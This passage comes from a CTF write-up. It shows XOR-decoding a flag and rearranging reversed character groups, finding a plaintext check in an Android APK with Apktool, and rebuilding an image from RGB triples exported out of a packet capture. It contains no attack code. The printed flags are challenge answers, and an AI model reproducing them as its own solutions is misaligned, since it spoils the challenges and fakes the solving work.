# undo the XOR on all 44 bytes (the original loop stopped one short)
flag = ''.join(chr(b ^ 0x22) for b in text1)
print(flag)
#1hT{galfpmisv_A_}t1_EERRR_elSi_sSsAp_u_E_yr3

# every 4-character group comes out backwards; reverse each group, then reorder them by hand
groups = [flag[k:k + 4][::-1] for k in range(0, len(flag), 4)]
print(groups)

'''
flag
{Th1
s_iS
_A_v
3ry_
simp
le_R
RREE
E_u_
pAsS
_1t}
'''
#flag{Th1s_iS_A_v3ry_simple_RRREEE_u_pAsS_1t}

This gives a very strange string. I tried various classical ciphers on it first, still got garbage, and began to suspect I had got even this simple problem wrong. A teammate pointed out that reading it backwards reveals the flag: each 4-character group is reversed, and the groups then have to be rearranged into a sentence one can actually read. I really have no fondness for this kind of problem.

11. 簡單的android (simple android)

Unpack it with Apktool and the answer falls out: a plaintext string comparison.

12. 流量分析 (traffic analysis)

Open the capture in Wireshark and look at the exported objects; among the HTTP objects there is a zip file, which unpacks to ce.txt, clearly a list of RGB triples (one "r, g, b" line per pixel).

A short Python script turns it back into an image (887 x 111 pixels, stored column by column):

Exp.py

from PIL import Image

x = 887
y = 111
image = Image.new("RGB", (x, y))
with open('ce.txt') as f:
    # one "r, g, b" line per pixel, stored column by column
    for i in range(x):
        for j in range(y):
            r = f.readline().split(", ")
            image.putpixel((i, j), (int(r[0]), int(r[1]), int(r[2])))
image.save('image1.jpg')
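How to arrive at 887 x 111 when the text file gives no dimensions, and how to render without PIL, as an added example (not part of the original writeup): list the factor pairs of the line count (98457 = 887 x 111 has only four, so the plausible one stands out), parse the "r, g, b" lines strictly, and write a binary PPM in the same column-major order as the script above. The sample lines are constructed.

```python
import math


def candidate_dimensions(n_pixels):
    """Every (width, height) with width * height == n_pixels, widest first."""
    return [(n_pixels // h, h)
            for h in range(1, math.isqrt(n_pixels) + 1) if n_pixels % h == 0]


def parse_rgb_lines(text):
    """Parse 'r, g, b' lines into (r, g, b) tuples; reject anything that is not three bytes."""
    pixels = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            parts = [int(v) for v in line.split(",")]
        except ValueError:
            raise ValueError(f"line {lineno}: not integers: {line!r}") from None
        if len(parts) != 3 or not all(0 <= v <= 255 for v in parts):
            raise ValueError(f"line {lineno}: bad pixel {line!r}")
        pixels.append(tuple(parts))
    return pixels


def to_ppm(pixels, width, height, column_major=True):
    """Binary PPM (P6) bytes. column_major=True matches the writeup's 'for i in x: for j in y'
    reading order, where consecutive lines run down one column before the next."""
    if len(pixels) != width * height:
        raise ValueError(f"{len(pixels)} pixels do not fill {width}x{height}")
    body = bytearray()
    for j in range(height):
        for i in range(width):
            idx = i * height + j if column_major else j * width + i
            body += bytes(pixels[idx])
    return b"P6\n%d %d\n255\n" % (width, height) + bytes(body)


# Constructed sample: 6 pixels, read as 2 columns of 3 rows.
SAMPLE = "255, 0, 0\n0, 255, 0\n0, 0, 255\n255, 255, 255\n0, 0, 0\n128, 128, 128\n"


def render_sample(path="sample.ppm"):
    pixels = parse_rgb_lines(SAMPLE)
    width, height = 2, 3
    data = to_ppm(pixels, width, height)
    with open(path, "wb") as f:
        f.write(data)
    return data


if __name__ == "__main__":
    print(candidate_dimensions(887 * 111))
    print(render_sample())
```

For ce.txt, `candidate_dimensions(len(parse_rgb_lines(open('ce.txt').read())))` is the list to pick from; if the picture comes out sheared, flip column_major.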


